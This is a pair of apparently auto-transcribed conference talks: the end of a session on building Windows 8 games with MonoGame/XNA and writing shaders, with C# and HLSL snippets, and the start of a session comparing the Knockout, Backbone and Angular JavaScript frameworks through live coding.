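    return Vector2.Distance(centerA, centerB) < radiusA + radiusB;
}

// Rectangle-vs-rectangle: build a bounding box from position plus texture size
// and let XNA/MonoGame's Rectangle.Intersects do the overlap test.
bool RectanglesCollide(Vector2 posA, Texture2D texA, Vector2 posB, Texture2D texB)
{
    var rectA = new Rectangle((int)posA.X, (int)posA.Y, texA.Width, texA.Height);
    var rectB = new Rectangle((int)posB.X, (int)posB.Y, texB.Width, texB.Height);
    return rectA.Intersects(rectB);
}
```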
And for every entry to the list I just add a random coordinate somewhere on the ground and I place these small images and for every oh sorry I didn't see that one. Okay let's do that again. That's better. So you can see the yellow artifacts. My job is to try to collect them. So right now the implementation of the touch works so you can actually start moving the dinosaur. And if I walk on this you collect them. So what I do here is to have my array of vector to the objects and I render the artifact texture once per element in the the list. Let's see here. So here it is. It's a list of vector to objects called collectible list. And I have a function called setup level which adds ten collectible elements to the list with a random coordinate somewhere between the width of the viewport. And I also place them on the ground based on the height. The same formula that I used to place the dino in the start. So what I need to do is to check collision between all of these. And I have a function called handle collision and it's called from the update function. And handle collision actually goes into the list and for every single element in that list I create a bounding box and I check for the collision. What you could do here for performance if there's a lot of elements on screen you could just check how far they are from you and if they're near enough you start actually putting calculating the calling this intersects function. This one returns true and if it's true it's gonna break the loop and remove the elements that is been collision collide with. So what happens if you collide with multiple sprites at the same time? Right now if you just remove one of them and that's the first one in the list and then we stop and handle the next one the next time update is called that is maybe the next frame or somewhere around there. So you could handle a function that removes all of them at the same time but this is just for demo purpose. So that's the intersects function and now we almost have everything you need to actually start creating games. What else is there? Yes there is text font. You want to render the score. I want to have a score when I collide with an artifact. I want to just get this up and running again. I want to have a score and once I collide with a game object I want to add maybe 1337 to this player score. So what I have here is a font object here and then what I did to add a font to the game was to just right click here add new item and then I can add a sprite font. A sprite font will give me an XML based file like this one. I say the font name and I say the font size here. The color is chosen when you actually render the text. So once I have this I can just load it this exact same way that I load textures. I do the content. I didn't load the function but this time I'm loading a sprite font instead of texture with the asset names sprite font one. Now I have a font size 42 and the fonts ago. So how do you render text using this new font? Luckily that's simple. You convert the font to sprites and use the sprite batch to render and this is really simple because you have a function in the sprite batch called draw string. You say I want to draw with the font called font and I want to draw the text that I'm storing the string here. It's going to be score plus an integer. That's score and you set the position. Right now it's just in the center of the screen and then in 10 pixels down from the top and I want to make the color saddle brown for some strain region. It could be whatever you want. 
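Pulling the collision loop, the sprite font and the score together, this is roughly what the code on screen amounts to. The "SpriteFont1" asset name and the 1337 bonus follow the demo; the field names reuse the earlier illustrative fragments:

```csharp
// Requires: using System.Collections.Generic;

List<Vector2> collectibles = new List<Vector2>();
Texture2D artifactTexture;
SpriteFont font;
int score = 0;

protected override void LoadContent()
{
    spriteBatch = new SpriteBatch(GraphicsDevice);
    artifactTexture = Content.Load<Texture2D>("artifact");
    // A .spritefont file is loaded exactly like a texture, just with a different type.
    font = Content.Load<SpriteFont>("SpriteFont1");
}

// Called from Update every frame.
void HandleCollision()
{
    var player = new Rectangle(
        (int)dinoPosition.X, (int)dinoPosition.Y, logoTexture.Width, logoTexture.Height);

    for (int i = 0; i < collectibles.Count; i++)
    {
        var item = new Rectangle(
            (int)collectibles[i].X, (int)collectibles[i].Y,
            artifactTexture.Width, artifactTexture.Height);

        if (player.Intersects(item))
        {
            collectibles.RemoveAt(i);   // remove the collected artifact
            score += 1337;              // award points
            break;                      // handle one collision per frame, as in the demo
        }
    }
}

protected override void Draw(GameTime gameTime)
{
    GraphicsDevice.Clear(Color.CornflowerBlue);
    spriteBatch.Begin();
    // DrawString works like Draw, but takes a font and a string.
    spriteBatch.DrawString(font, "Score: " + score,
        new Vector2(GraphicsDevice.Viewport.Width / 2, 10), Color.SaddleBrown);
    spriteBatch.End();
    base.Draw(gameTime);
}
```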
Your favorite color. Something that suits the game. If I press play now you can actually see that score is 4,011 and why is that? Because once I spawn all the artifacts in the game I spawn stuff with a dinosaur standing. So that's the reason why you collect some of the artifacts once you start. And you can walk around and you get 1,337 points every time you hit an artifact. And now it's just up to you and maybe you can use a switch case to draw a game over screen or a new high score. I think that a lot of people are going to get the same high score but it's up to you how to implement this. All the source codes on this example is out there so you can just download it and start playing for yourself. And feel free to use my dinosaur assets. They're cool. I spent like 10 minutes drawing them. So I want to show you some other stuff as well. Not just spawn a game. So using those skills that I just thought you today with exception of playing a sound which is two lines of code you load a sound file with the exact same function. Load content.load. Write sound effects and asset name and you say the sound effects.play when you want to play the effect. So it's very very simple. I don't have an example on it but I can help you out if you need that. Sorry? You play in the update loop. Everything is in the update loop. But remember to just play it one time. Like if there's a collision and then maybe have a true or false value that says that now you're gonna have to play a sound. Then you play a sound and make sure not play the time over and over and over 60 times every second. Because then you're gonna get this annoying sound of the sound effect. They're starting all over multiple times. Yes? Sorry? I do not know the exact answer to this but I think it's fixed with. It just rendered the same as you should have used the font in Word. Yeah, it depends on the screen resolution for you too. So if you have a high screen resolution, your text might be smaller. So you might have to adjust that. So now I'm going to move over to shaders. Has anyone done shaders before? Yes? There's some shader programming here and then back there. Okay, that's cool. I do really love the shader programming. On my blog I actually have a 25-part tutorial on how to do shader programming. So if you're interested in learning this, go to my blog and read my tutorials because I've got a lot of good feedback on them. They're simple to follow and with examples and videos of all the effects. So does anyone understand this? Let me explain to you what happens in this nice little equation. You have a surface. The black in the bottom is the surface. So this part here. So what this function does is to go into all the different surfaces this model would have. And there's a lot of normals going straight up here. Every surface has a normal N that goes right up. And then I have the light source over there which goes there and reflects. That's the R. And the V is my eye looking down here. So the light source comes down there, goes somewhere here and my eye is going here. What I want to calculate is the amount of light that actually goes in there, reflects here and hits my eye directly. Did anyone look at the car and there's this little spot that really blends you? That's something called the specular highlight. A specular highlight is the bright parts of stuff that make stuff look shiny. So this is the implementation, the formula of that. And the formula is basically the angle A between the reflection vector and V. 
The less the angle is, the more light actually hits the eye. Then I can use this in the light equation in the top of there. A is just the color of the surface in the room without any light. D is the color of, you can say the diffuse light, some light that looks down on it. It's the diffuse light that you can see, the color of the light maybe. That's around there in the room. And the specular is the formula you see down there. It's the S I times C and the dot product between R and V. So the dot product between R and V actually generates the highlight. You don't have to actually know all this, but I'm just gonna show you this example. So this is the pixel shader that calculates all of this. A pixel shader is something that enables you to customize the pipeline of rendering stuff to the screen. So back in the old days, all the games looked the same basically. You have 3D models and you had maybe awesome texture in work that did the difference between good graphics and bad graphics. But the process of calculating lights in the game and how things look was the same. That made all the game look the same, but in 2001 I guess, shaders was introduced. And this code was actually written in assembly before. And you actually had to call this using assembly instructions. But luckily, a few years later we got something called GLSL and HLSL which is high level languages for writing shaders. So GLSL is for open GL and the DirectX is HLSL. High level shading language. And this is high level shading language. This actually looks like a function and that function gets called in all the pixels on the screen. So for every single pixel in the screen you do this. And that's a lot of pixels. It's not the pixels on the 2D screen. It's pixels around objects on the backside of the object on the front side, wherever in your 3D screen. So this function should not be too long because you do want to run this 30 to 60 times per second. And this is a heavy, heavy operation. And that's why ray tracing is so costly because you do this on everything on the screen and it takes a lot of time to do heavy, realistic lighting in a game. But we're getting to a place where it's getting pretty good. If you compare a game now to maybe only three, four years ago, there's a huge difference in the graphics. That's because of the capability of the graphic cards to actually render more hardcore shaders. So a pixel shader is just one part of the pipeline that you are actually able to modify. You could also modify the vertex. The vertex shader is called for every vertex on a 3D model. So if this was a 3D model, this would be built up by either maybe 50 or 100 vertexes points that saying that this is the surface of my hand. It could also be one million. But calling a vertex shader with one million points to do a hand is a lot of code. You really have to think about that too. That's why you can't have really, really high polygon models in a game because there's a lot of points that you have to actually process. So games are all about making things with a few vertexes look realistic and you kind of try to trick the eye to make it look like I have these small surface bumps in my hand. So you can have algorithms that can calculate bumps in my skin that makes it look like there's bumps, but there's really not any bumps in your 3D model. 
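Written out, the lighting model being described is the familiar Phong-style equation. This is a reconstruction from the spoken description rather than a copy of the slide:

```latex
I \;=\; A \;+\; D\,(\mathbf{N}\cdot\mathbf{L}) \;+\; S\,(\mathbf{R}\cdot\mathbf{V})^{\,n}
```

Here A is the surface colour without any light, D the diffuse light scaled by how directly the light hits the surface, S the specular colour, N the surface normal, L the light direction, R the reflection vector, V the view direction, and n the shininess exponent (the hard-coded 15 in the demo shader) that controls how tight the highlight is.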
So just to show you this, what I'm doing here is to take the normal, I calculate the diffuse light, and then I take the reflection vector and I calculate the specular based on the view vector, the dot protein product between the view and the reflect. And the 15 hard-coded number back there, that's actually just a number that makes the size of the highlight area. So if that number is really low, you get this really big size and if it's high, you get a smaller one that makes it look like plastic or something. You can really control the effect by modifying the value there. But a lot of people does not like to write shaders. It's hard, it contains errors, something happens based on different angles, you didn't calculate everything. So a lot of work goes into writing shaders. I really love it, but it's hard. I spend a lot of time for every single shader that I write. So what I want to show you is a new thing in Visual Studio. Maybe some of you guys know this. I'm just gonna close this like this. And I'm gonna create a new project. And this time I'm just gonna do a Diathex project. You could write, make the end shader here and then export it to XNA or something like that. Monogame does support shaders. It's called MGFX, Monogame FX. And it's basically the same kind of language as a high-level shader language. So what I want to do is to create a 3D application and I hit OK. I'm not gonna do much coding right now. I'm just gonna show you this neat little tool that actually really, really good for developers doing Diathex applications. So what I can do in my project is that first of all I'm gonna show you this. I can add a graphic to my project and I could add a 3D scene. So using this I actually get an in Visual Studio editor doing a way you can actually start adding stuff. So you have a toolbox and I can add a cone into my scene. I can add stuff in there and I can write shaders on this. This is really good for testing and trying out your game. Another cool thing is that you could add a new item and I do a visual shader graph. This gives me a nice little editor where I can drag and drop to create shaders. And this is pretty cool. So let me just show you a quick example. I want to implement the formula I gave you on the specular highlight doing this in the shader editor. So what I do here is that I have a color. I don't need it anymore. This is the final color of the pixel for every single pixel on the screen. So what I want to do is to add a color to that one. So I go to the toolbox and there's a lot of math functions that you can add and use when you create a shader. So I use the color constant. I pull it out here and maybe I would like to have this color something like this. Yes, looks nice. And if I drag the RBG of this one into this one you see that I get a flat looking 3D model, a teapot. So I would like to do something else. You can just right click here and break the line. And I can add... let's see here... and Lambert, which is the diffuse light. The person called Lambert actually invented this algorithm that the shader is using. Then I can just pass in the RBG into this one and then I can send the result of this function as the RGB into this one. I can see that I have a nice diffuse light on the teapot like that. So I only need to add the specular highlight to it. And to do that I can add the specular and just pull it out here. What I need to do is to remove the connection here because I need to add these two together. And then I take this one and I say add like that. 
I can combine these two using this like that and then put the result in there. So what we have here is the diffuse plus the specular highlight on the teapot. So if I go into the constants here in the shader I should have something called the specular here. Let's see... so let's put this into one. Okay, just enhance the effect a little bit. I can actually see that I have the specular highlight. So those white parts on that teapot is that formula I wrote the shader on. That's the light coming down on the surface and reflecting directly around the eye. That thing that hits you directly in the eye should just be the color of the specular and then gradually fading to the color of the surface based on the angle from the eye. So if you hit something around here it still gets a little bit of the effect on the surface. Just to take it a step further you could do... try to create a glass object. So this is a shader I wrote a few years ago. I'm just going to show you some images of it. What it does is to have an object there and once the ray of light hits the object it goes through the object for a certain number of distance. So I actually calculate the length the light travels inside that object and based on the length it should be more and more colorized by the object. So this should look a bit like glass and the thicker the glass is the more of the glass affects the ray gets while traveling through it. So Bier Lambert wrote a simple equation for this which actually colorizes the T is the transmittance effect on the color and it calculates based on the distance the constant C and the constant C is just a constant you can give to a particular glass object because some objects colorize the ray more than other ones and the longer it's in there the higher the transmission will be and A is calculated by the logarithm of T and the distance. 
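The equation being referred to here is the Beer-Lambert law. In its usual form the transmittance T falls off exponentially with the distance d the ray travels inside the material and a per-material constant c, and the absorbance A is the logarithm of the transmittance:

```latex
T = e^{-c\,d}, \qquad A = -\ln T = c\,d
```

So a thicker piece of glass (larger d) or a more strongly coloured material (larger c) lets less light through, which is exactly the effect described above.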
Then I could add reflection to this as well so I had the transmittance effect and then I have the reflection that we did the specular highlight that I just showed you I add that and then I can add refraction so instead of just traveling through the object the light can bend based on the angle it goes into the object with so I can just use the index table from the physics class and calculate it based on Snell's law and result is pretty good as you can see it does look a little bit like glass it's simple it's a quick a quick shader you can do this on objects in your game and make it look really really nice that's the power of shaders you can combine shaders and create really really amazing effects and they're simple to write just to show you a quick video of this effect running like this you can see here that it refracts based on the light and the background so I'll go the algorithms are perfect it does exactly what you want it to do you write a code and it does that but imperfection creates perfection what does this really mean let me show you an example you see this mud graphics this is a procedurally generated image based based on Perlin noise that generates ground or some kind of texture I think you use on the ground when you walk at some kind of landscape so what happens if you take this algorithm to scale this up a little bit you get something like this you can see it's the same algorithm just repeating all over to create a pattern and you can really see the pattern because this function is perfect what you really want to do is to create something like this instead of just repeating you actually try to create a function so it gives you more randomness and irregular patterns this could be the wood bark of a wood or a tree or something you really really want to make that look perfect imperfect rather than just following the algorithm because it will make trees look the same all over and you could really see the pattern repeating all over you want to really avoid that just just to keep that in mind when you produce shaders and you start producing games so I still have a minute left I'm just gonna quickly talk to you about the Lumilite game and there's a lot of logic going in when you create a game you really have to really think about okay well how is the game working on this example I have flies traveling all around and how do they travel around you have to think about that so when you create a new game put a piece of paper and draw the game and think about what is the movement what is the player movement how does the enemy move how is the input how is the design so this is the sign of my game and this is the movement of the fly so I brought a simple AI for this one just checking states and I changed the state on every random interval so every time this is updated I give it a new time maybe three second you should continue that direction three seconds and then we evaluate if it should change direction or not may get it look very random it's not very easy to actually hit it but I know as a gamer you actually have to place and I drew the game I drew every level of the game and I made this paper cuts of the dinosaurs here to so I can place them around and the level and create cool stuff so that's my talk around unfortunately I wasn't able to show you bandinals because it didn't load for some strange reason but come to my stand I'm happy to show you how bandinals were created the level editors and how it everything was made you can find all the materials of this presentation at digital arrow 
dot wordpress dot com, which is my blog. You can find a lot of tutorials there, as well as Commodore 64 programming tutorials. If you're interested, I'll teach you how to create Commodore 64 games in assembly on a Windows machine; just go in there and check out the tutorials. Come to me and talk with me, I'm happy to help you out. I really, really do like game developers and graphics and talking about it, so I'm happy to help you out wherever you need. I'm on Twitter if you've got questions, and I'm prioritizing graphics programmers. So thank you very much.
|
Want to learn how to create games for Windows 8? This session will give you the information you need to get started with game development. We will take a look at the different technologies available for creating games, learn how to use MonoGame/XNA and how to write some simple shaders for advanced 3D effects.
|
10.5446/51495 (DOI)
|
I'm going to be talking about the JavaScript inferno. This is going to involve a lot of code, but not straight away. So there's a little bit of stuff I've got to go through. I'm going to go through some slides here. I'm going to be live coding, and I just want to tell you that straight up front. It's not going to be too deeply technical. It's more process-oriented, so I kind of want to get that out of the way straight up front. If you guys want a deep technical talk, you want to go crack some code, then by all means, I won't be offended. Maybe a little bit. But let's get to it. Okay, so this is, as I mentioned, a bit of a story about my adventures with JavaScript. That's pretty much it. So about three years ago, I started dabbling with JavaScript again, and I kind of went through all kinds of permutations, hating it, loving it, hating it, loving it, hating it, loving it. And I ended up just this last week deploying an app that was heavy, heavy JavaScript, talking to an API in the back. It's our Tekpub app. It's live. We still have some problems. But I found it absolutely fascinating the things that I was able to do, and I thought it would make an interesting talk. And by the way, one last thing I wanted to mention. You guys have kids. I'm sure some of you must have kids. Last year I tried a little experiment where I gave my kids my old iPad, and it had this app called Paper on it, and I said, I need some slides done for me. And so they cracked together some pictures of elephants and dolphins doing all kinds of things because I was talking about Postgres and MySQL. And it was great. So this year I decided to up it a bit, and I said, help me write this story. And they said, OK, we'll help you. And so my two daughters, Maddie and Ruby, helped me with these slides. So all the slides you're about to see are their drawings. And they actually helped me write the story. So if you see princesses and fairies and bunnies, it's all their doing. So as I mentioned, there are 15 slides. This is slide number three. I'm going to dive into code in just a minute. I just want to say this straight up front. I'm going to slide right through these things. So I'm going to talk today about things that I've learned, as I mentioned, the hard way, good way, bad way, every which way. I'm going to talk about frameworks that I've used. And I'm going to also sprinkle it with some opinion. And it's not going to be heavy opinion. Like, oh, I hate this. This is good. This is bad. It's just from my experience. So I don't want you guys to think I'm telling you what I think is right or wrong. It's just what I've experienced. This is also about failing and failing hard. And the funny thing about JavaScript is if you like to fail, then JavaScript is your language. Seriously, though, we learn by failure. And if you talk to a hardcore JavaScript dev that's been doing it for five, 10 years, whatever, they'll give you this look, like, what's wrong with JavaScript? And then if you talk to somebody who's been doing it for, say, two to three years and just has come out of the pain point areas like me, they'll say it's actually a lot of fun. And so that's kind of the way I want you to think of this talk.
This is what talk I'm going to give. You and I are having a beer or coffee or a tea, and you say to me, I hear you even doing JavaScript, and I say, yeah. And you say, why do you like it? So this is that talk. We have an hour to have a little discussion about why I like it. I think I like it because I fail so much. And it's really weird. I fail at it all the time. And in this talk, I'm going to fail. I have studied. I have demos that work, but I have no doubt that I will freeze up and fail. And I think that's good because I'm going to walk through how I'm going to dig myself out of a hole. And I think that's really important when talking about JavaScript. I also think since you fail so much and you succeed maybe 10% of the time, it kind of makes you feel like Superman when you can succeed maybe 11% of the time. The other thing is if you stick with JavaScript, it's going to change the way you think about things. So for instance, I wasn't an evented programmer guy. I didn't work with events, although you can in many languages like C-Sharp. You can use callbacks and closures and all those things. Now having been through the fire, I have kind of learned that there are different ways of solving things. And it's really fascinating. It changes the way you think. So the point being, be positive as you learn this stuff and fail a lot. So the first framework, there goes my voice. The first framework that I'm going to talk about is knockout. When I started working with knockout two years ago, I hated it. I thought it was the most ridiculous thing I'd ever seen. Is anybody here, everybody here familiar with knockout and what it is? I figured, yeah, good. Knockout is just a really quick and dirty MVDM framework from my friend Steve Sanderson. I didn't like it very much. Every code sample I saw made me want to throw up. And I finally met with the guy, and he's the best guy in the world, and he showed me a few things, and I said, wow, that's great. So my daughter asked me, well, what kind of thing, what did it make you feel like? I'm like, it's too much magic. And so I have an oversized stinky bunny. So I don't know. I'm going to give that to Steve. So the next one I'm going to talk about is backbone. Backbone is the next framework I dabbled with after playing with knockout, because at the time, those were the two you had to choose between. See this right here? That's backbone right here. This is... I don't know why I had such a hard time with backbone. I really don't. Looking back on it now, what was wrong with you? It was confoundingly difficult. And so how I learned backbone is actually going on long walks at night with my dog, Reefy, that's my dog, Reefy, right there. And I would talk to him. I'm not kidding you. Late at night, my kids are in bed. I'd walk up the street and go, okay, routers. Okay, wait, routers and events. I'm... And so, yeah, finally got it. And you know how the process of explaining something to somebody, you kind of get it. So yeah, Reefs now a backbone programmer. And then the third one, of course, is Angular. Angular, it's an Angular party. I don't know what's going on there, but I've been using Angular a lot recently and getting really into it. So those are the three I'm going to talk about. So what I'm going to do, I'm going to do some simple tasks. I'm going to do them all in series, backbone, knockout, Angular. And then I'm going to compare and contrast the code. And then what are we going to talk about? What do we think of that? 
That's me right there about to go on a journey. So the tasks I want to do, number one, I just want to show some simple data on a page. This isn't heavy stuff. I just want to show some stuff on a page, right? That task two is output a list of data. Number three is I want to toggle a class on and off, change colors, red, green, whatever. Just do some simple work. And then number four, excuse me, I'm counting a JavaScript again. I want to save some data. See what it's done to me. So as I mentioned, this is not heavy stuff. But again, I want to drive this home. The point is that these frameworks, if we solve a problem in a particular way, I want to appeal the covers back. I could show you all kinds of fun stuff to dive deep and like, this is what you do and there's a Grand Canyon. And then we'd have a good time and you'd learn something. But this is not a tutorial. This is more a process of philosophy. Because I want to get it. Don't ask me what the ham thing is. I have no idea. I told I wanted to catch the flavor of each one. That's what it was. So that's what this is. It's getting into the philosophy of each framework and what it means to work in them. So the next question is probably on a couple of your minds. Okay, we got Angular, Knockout, and Backbone. What about Ember? What about Sproutcore, JavaScript, MVC, Batman? There's so many out there. The simple answer is, I'm going with what I know. And by what I know, I mean these are frameworks I have deployed into production live. And so those are the only things I can really speak about. So that's answering that. And as I mentioned, it's all code and we are on slide 15 and I am going to start. By the way, I want this to be sort of a casual thing, so if you have a question, shout it out. And if you see me screwing up, shout that out too. All right, so let's get started here. So I am using Twitter Bootstrap and that is the site. It's a blank slate. Here's the code. Let me collapse this down so we can all see it. There we go. All right, turn back on. OK, so the first thing we're going to do is just something simple with knockout. And so as you can see down here, I have all of the scripts added into the page. And so what does it mean to work with knockout? Well, the interesting thing about knockout is it just works kind of right in the page with you. So the first thing I want to do is I'm just going to add an input here and it's going to be text. And to work with knockout, you have to do this thing called data bind equals and you have to tell it what you're going to data bind against. So the data dash tags in HTML5 are perfectly valid, but what I'm about to write isn't. And this is an expression in knockout and this is the thing that freaks a lot of people out, but if it works, it works. So I'll put this here. And let's see. All right. So to work with knockout, all you got to do is, as I mentioned, you got to have it on your page. I have the minified knockout. And the first thing that you're going to do is you're going to create a model. And let's see. And I'll tell you what I'm doing here in just one second. You ever try and type in front of a bunch of people? Say that again? Did I spell it wrong? Thank you very much. Yay! I love you. Are you participating? I love it. Let's see. This is a description. I actually have, just so you know, it's not going to be this painful the whole time. I have shortcuts here, but I want to type it all out first, just so you guys can see it. Okay. So return self. There we go. Okay. 
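For readers following along, here is a rough sketch of the kind of markup and view model being typed in this demo. The property name, the endpoint and the markup are illustrative, not the exact demo code:

```javascript
// Markup, for reference (data-bind is a plain HTML5 data- attribute that Knockout parses):
//   <input type="text" data-bind="value: description" />
//   <p data-bind="text: description"></p>

// A Knockout view model is just a function; 'self' sidesteps 'this' scoping surprises.
function OrderModel(data) {
  var self = this;
  self.description = ko.observable(data.description);
  return self;
}

// Plain jQuery pulls JSON from the API, then Knockout binds it to the page.
$.get("/api/orders/1", function (result) {
  ko.applyBindings(new OrderModel(result));
});
```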
That is a model, a view model, if you will, in knockout. That's it. It's a straight up function. And what I'm doing with this is I'm just passing in a JSON dump of data. And it's going to go straight in there. It's going to do some fun stuff. What's it going to do? Well, let's make it talk to our API. So here I'm going to use jQuery. And this is one of the fun things about knockout is it works directly with jQuery, like just right hand in hand, which I really love. And so I'm going to do a gets, and I'm going to call back to the API and the function. All right. Here comes the magic. I said, here comes the magic. All right. So really quickly. This is Node.js that I'm running here. And I'm doing it only for simplicity. I'm running Node.js and behind Node, I have an API sitting here, and I have a store. I just want to show you that really quickly. I'm not doing anything magical. And if I go here to API, you can see there is a bunch of JSON. And it's orders, and it's just an API. It's in all descriptions. So I just kind of want you to see that really quickly. So let's go here and see if I manage to do things right. Yes. Okay. I'm going to do it. Whoops. And his body is not defined. I have an error right down here. Let's see. So if Knockout gets an error, I told you it was going to fail. I didn't think it was going to be on the first demo. If it can't find what you're trying to do, it'll tell you. I can't find body. And so let's go and take a look at that. And I'm going to explain this in detail. There we go. Description. What's that? Thank you. That would help, wouldn't it? All right. Good. Thank you very much. Rob, what are you doing? Result. Thank you. There we go. Okay. This is working, and this is what Knockout's specialising in. You can change this. And when I click away, it updates the page. We've all seen this demo. Let's take a look at this code in a little bit more detail. It sounds like you guys are familiar with Knockout. It sounds like this isn't sensationally difficult. I just want to explain a little bit that the thing that is nice to me about Knockout is that it doesn't stray too far from JavaScript. If you understand JavaScript, then you can work with Knockout. And if you guys notice when I screwed up there, it actually worked if you just sent blank JSON into Knockout. It bound just fine, except for a few things. Down here, you can just see this is a straight up call. Didn't do anything exciting. Knockout's doing a bunch of fun stuff for me. So what I'm going to do is I'm going to just take the scripts, and I'm going to pop it into the save bin right here. And now let's do the same thing with Backbone. Are you guys familiar with Backbone? Okay. This is going to be a little bit more fun. All right. So with Backbone, what I'm going to do straight away is I am going to have to create a few things on the page here. So let's get rid of our Knockout stuff. So the first thing I'm going to do is I need to give it a place to output. And so to do that, I'm going to, let's see, call this the view. Oh, actually I'm going to use this. I've got that already. Okay. So the first thing I need to do with Backbone is create. Let's put up a template. Boy, come on, fat fingers. Geez. Last year I did a talk, but I didn't talk. And I just sat there in code and I thought that was hard. Okay. So this is going to be straight up the template, and we're going to use the Backbone. So does this look familiar to you guys? Do you guys know what script templing is and what works? Okay. 
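For reference, the Knockout version of that first task, collected in one place, comes out to roughly the following sketch. The /api URL and the title and description fields follow the demo; the exact bindings are an approximation, and the fields are made observables so the click-away update works:

```html
<!-- The data-bind attributes do the wiring -->
<h2 data-bind="text: title"></h2>
<input type="text" data-bind="value: description" />

<script>
  // A plain function acts as the view model; the JSON from the server seeds it.
  var ViewModel = function (vals) {
    var self = this;
    self.title = ko.observable(vals.title);
    self.description = ko.observable(vals.description);
    return self;
  };

  // Plain jQuery fetches the data, then Knockout takes over the bindings.
  $(function () {
    $.get('/api', function (result) {
      ko.applyBindings(new ViewModel(result));
    });
  });
</script>
```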
Well, I'm going to explain it more in just a second. So this is going to be parsed by Backbone and filled with data as soon as we pull it from the server. And so what I'm going to do is just output this. This should look familiar to you if you've ever done ASP.net. And P goes description. All right. That's simple enough. Let's go now and pull some data. Okay. So the first thing I need to do in Backbone is I need to create a model. And so it's backbone.model.extend. And that is that. Oh, right. She's getting out of my way. All right. So what I'm doing right now is known as boilerplate. What it means is you've got to go through these. You've got to make these functions in Backbone and you have to go through and you have to absolutely touch every single part of your application, every single part of what you're trying to do. And it's long and monotonous. And so this is one thing that made it difficult for me to use Backbone is when you're writing this stuff out, you have to remember every single incantation. And the worst possible thing is when you screw up, nothing shows up. No errors, nothing. So you have to work your way backwards. And so what I'm doing here is I'm telling this view, because views are reactive in Backbone and they're evented. So I'm binding an event to this view and I'm saying whenever the model that is behind this view changes, I want you to do a thing. And that thing is going to be to render yourself. And then I have to tell it that, remind it where the scoping is. I'll talk about that in a second. It's just a crazy pain. Okay. So now that I'm telling it, it needs to render itself whenever the model changes, I now need to tell it what the render function is. So this is another thing in Backbone that is just a crazy incantation. You're going to go over and over and over it again. So the first thing you've got to do is you've got to find where your template is that you're going to be rendering your model into. And so I declared that here in the script tag. So I'm going to use some jQuery here and I'm going to find that script tag and I've got to give it an ID. So we'll call it model template for now. And then model template.html. And now that I've got that, I've got to call the compiler. Compiled, and then it's going to be using the underscore templating engine. Underscore is a helper library that comes along with Backbone. Oh boy. Template. And then I'm going to pass in the source of the template, which I just pulled out of the DOM using jQuery. And then I'm going to pass in this model and toJSON. Right. And now that I've done that, this is where the fun starts. Okay. What am I doing here? This standard render function inside of Backbone, something you'll have to remember every time you use it. The way to get around this is to abstract Backbone into a higher level, which is something my friend Derek Bailey did, something I recommend you do, using a project like Marionette or some other. So inside here, you go through the same three steps every time for every view. Number one, you have to create your template. Number two, you got to create your view object. In initialize, you got to bind that stuff together. You got to bind a model to the view. And then when that fires off, you got to say, okay, pull the source out, use jQuery to do it. Now compile it using the template compiler and then boom, stick it in the DOM. All right. Yes, I got to create my model. So I need to do all that right now. All right.
So what I'm going to do here is create my model, and model equals new Model, and var view. And I got to instantiate this new MyView. And I'm going to tell the view when it spins up el. I'm going to tell you what el is in just a minute. You're going to be planted in the view. And your model is going to be the model. Who wants to take bets on whether it's going to work, for a shot? And all right. So here I'm going to instantiate the model, right. And I'm telling you that the element, every view is bound to an element. And this is a tricky part of Backbone. Every view is bound to an element and it's represented by el. And inside of here, you can also work with a j-querified element, dollar sign el. And I'm just telling it, take that, bind it to your element, bind the compiled stuff to the element and show it on the page. So that element is right here, the view. So ideally, if everything works, it's going to stick itself in there. Well, how am I going to kick this all off? I just have to say model.fetch. So when I call fetch, what it's going to do is it's going to say, oh, well, I'll go fetch some data from my API. And it's going to go out, hit that, pull the JSON back, and it's going to refresh itself and fire the change event. When the change event happens, the next domino ticks and it's going to call the render function and off we go. All right. So that's it. Remember I told you failing is fun and when you succeed, it's a really good time. So that's it. That's it with backbone. So let's take this code and we'll put it over here into our save bin. OK. And I'm going to get rid of this. Now let's do this with Angular. Has anybody used Angular here? We're seeing demos. This isn't quite fair. Backbone's been around for years. Angular's been around for a while too, but it's got a lot of niceties and it's got the power of Google behind it. So the API is just a little bit cleaner and easier to use. So let's take a look at that. The first thing I need to do here is I need to tell Angular that we have an application. So I do that. I've already done it. I just drop in the attribute ng-app. And that's a magical thing with Angular. And what Angular's going to say is, oh, goodie. Anything inside this now I own. And what Angular literally does is it elevates your DOM to have new abilities. And it's kind of magical too, I suppose. So now that we have ng-app declared, I need to create a controller. And I'm going to create a controller and I'll just call it my controller. And this is the part I love about Angular. A controller is just a function. Just give it the same name. And that's a controller. There's no inheritance here. And that's an interesting thing to me. When I first started playing with Angular, I thought, well, that's fascinating. There's a lot of things you can do, you're going to have better accessibility and so on with this kind of thing. So let's go and grab some data. And now we come up against the next thing with Angular. If you want to work with the framework, you inject what you need into the functions that you're using so that the framework itself has a bunch of little tools that are kind of floating around out in memory. And you can use them whenever you want. And to use them, all you have to do is ask for them. So the first thing I'm going to do is ask for a thing called scope. And I'll talk about scope in just a second. The second thing I'm going to do is ask for a thing called HTTP. HTTP is a light wrapper on jQuery. JQuery is bundled with Angular.
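Before going further with Angular, here is roughly what the Backbone version just completed looks like once it is assembled. The template id, the #view element, and the /api URL are assumptions based on the demo, and the model's url property (which fetch needs) is implied rather than shown on screen:

```html
<script type="text/template" id="model-template">
  <h2><%= title %></h2>
  <p><%= description %></p>
</script>
<div id="view"></div>

<script>
  // Boilerplate step 1: a model that knows where its data lives.
  var Model = Backbone.Model.extend({
    url: '/api'   // fetch() needs this; assumed from the demo
  });

  // Boilerplate step 2: a view that re-renders whenever its model changes.
  var MyView = Backbone.View.extend({
    initialize: function () {
      this.model.on('change', this.render, this);   // the third argument pins the scoping
    },
    render: function () {
      var source = $('#model-template').html();      // pull the template source out of the DOM
      var compiled = _.template(source);              // compile it with underscore
      this.$el.html(compiled(this.model.toJSON()));   // stick the result into the view's element
      return this;
    }
  });

  // Boilerplate step 3: wire them together and kick it all off.
  var model = new Model();
  var view = new MyView({ el: '#view', model: model });
  model.fetch();   // GET /api, set the attributes, fire 'change', which triggers render
</script>
```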
